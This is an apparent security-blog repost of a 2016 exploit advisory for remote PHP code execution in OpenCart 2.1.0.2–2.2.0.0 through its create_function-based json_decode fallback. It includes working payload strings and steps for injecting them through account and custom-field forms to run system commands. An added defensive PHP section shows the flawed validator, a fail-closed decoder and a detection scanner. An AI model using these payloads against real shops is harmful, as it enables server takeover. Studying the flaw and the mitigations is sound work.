K8拉登哥哥's Blog

K8搞基大队[K8team]: information security, network security, 0day vulnerabilities, penetration testing, hacking

[EXP]OpenCart 2.2.0.0 Remote PHP Code Execution  

2016-04-19 16:49:52 | Category: Web_0day

##
# OpenCart json_decode function Remote PHP Code Execution
#
# Author: Naser Farhadi
# Twitter: @naserfarhadi
#
# Date: 9 April 2016
# Version: 2.1.0.2 to 2.2.0.0 (Latest version)
# Vendor Homepage: http://www.opencart.com/
#
# Vulnerability:
# ------------
# /upload/system/helper/json.php
# $match = '/".*?(?<!\\)"/';
# $string = preg_replace($match, '', $json);
# $string = preg_replace('/[,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/', '', $string);
# ...
# $function = @create_function('', "return {$json};"); /**** The Root of All Evil ****/
# $return = ($function) ? $function() : null;
# ...
# return $return;
#
# Exploit(json_decode):
# ------------
# var_dump(json_decode('{"ok":"{$_GET[b]($_GET[c])}"}'));
# var_dump(json_decode('{"ok":"$_SERVER[HTTP_USER_AGENT]"}'));
# var_dump(json_decode('{"ok":"1"."2"."3"}'));
#
# Real World Exploit(OpenCart /index.php?route=account/edit)
# ------------
# go to http://host/shop_directory/index.php?route=account/edit
# fill $_SERVER[HTTP_USER_AGENT] as First Name
# /** save it two times **/
# Code execution happens when an admin user visits the administration panel; in this example
# the admin user sees his own user agent as your First Name in Recent Activity :D
#
# Another example(OpenCart account/edit or account/register custom_field): /** Best Case **/
# ------------
# if admin adds a Custom Field from /admin/index.php?route=customer/custom_field for custom
# user information like extra phone number,... you can directly execute your injected code.
# go to http://host/shop_directory/index.php?route=account/edit
# fill {$_GET[b]($_GET[c])} as Custom Field value
# save it
# go to http://host/shop_directory/index.php?route=account/edit&b=system&c=ls /** Mission Accomplished **/
#
# Note:
# ------------
# Exploit only works if PHP JSON extension is not installed.
#
# Video: https://youtu.be/1Ai09IQK4C0
##
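The PHP below is an added example, not code from the advisory or from OpenCart. It reproduces only the validation stage of the vulnerable fallback (with the lookbehind written as a valid single-quoted PHP regex) so you can observe the accept/reject decision without ever calling create_function, then pairs it with a fail-closed decoder that requires ext/json and a triage scanner for PHP interpolation syntax in customer-stored data (first name, custom_field values, recent-activity records, as the advisory names them). Function names and the sample inputs are constructed.

```php
<?php
// Added example (not OpenCart's code). The three payload shapes are the ones the
// advisory lists; the benign sample is constructed. The fallback accepts an input
// when the residue left by its two regex passes is empty.

// Pass 1 deletes the contents of every quoted string before pass 2 checks the
// remaining characters against a JSON-syntax whitelist, so nothing written inside
// the quotes is ever inspected, yet those quotes later become a PHP double-quoted string.
function legacy_validator_residue(string $json): string
{
    $noStrings = preg_replace('/".*?(?<!\\\\)"/', '', $json);                            // pass 1
    return (string) preg_replace('/[,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/', '', $noStrings); // pass 2
}

// Fail-closed replacement: decode with ext/json or refuse outright. Untrusted input is
// never turned into PHP source, so there is nothing for string interpolation to expand.
function safe_json_decode(string $json, bool $assoc = true)
{
    if (!extension_loaded('json')) {
        throw new RuntimeException('ext/json is required; refusing an eval-based fallback');
    }
    $value = json_decode($json, $assoc);
    if (json_last_error() !== JSON_ERROR_NONE) {
        throw new InvalidArgumentException('invalid JSON: ' . json_last_error_msg());
    }
    return $value;
}

// Triage aid for data customers already stored: PHP variable syntax ("$name",
// "$name[key]", "{$...}", "${...}") has no place in a name or custom field.
function looks_like_php_interpolation(string $value): bool
{
    return (bool) preg_match('/\$[A-Za-z_]\w*(\[[^\]]*\])?|\{\$|\$\{/', $value);
}

// Constructed samples: one benign document plus the advisory's three payload shapes.
$samples = [
    '{"ok":"1"}',
    '{"ok":"$_SERVER[HTTP_USER_AGENT]"}',
    '{"ok":"{$_GET[b]($_GET[c])}"}',
    '{"ok":"1"."2"."3"}',
];
foreach ($samples as $json) {
    printf("%-36s legacy accepts: %-3s flagged: %s\n", $json,
        legacy_validator_residue($json) === '' ? 'yes' : 'no',
        looks_like_php_interpolation($json) ? 'yes' : 'no');
}
```

All four samples leave an empty residue, so the legacy check accepts every one of them; only the scanner separates the benign document from the three that carry interpolation syntax.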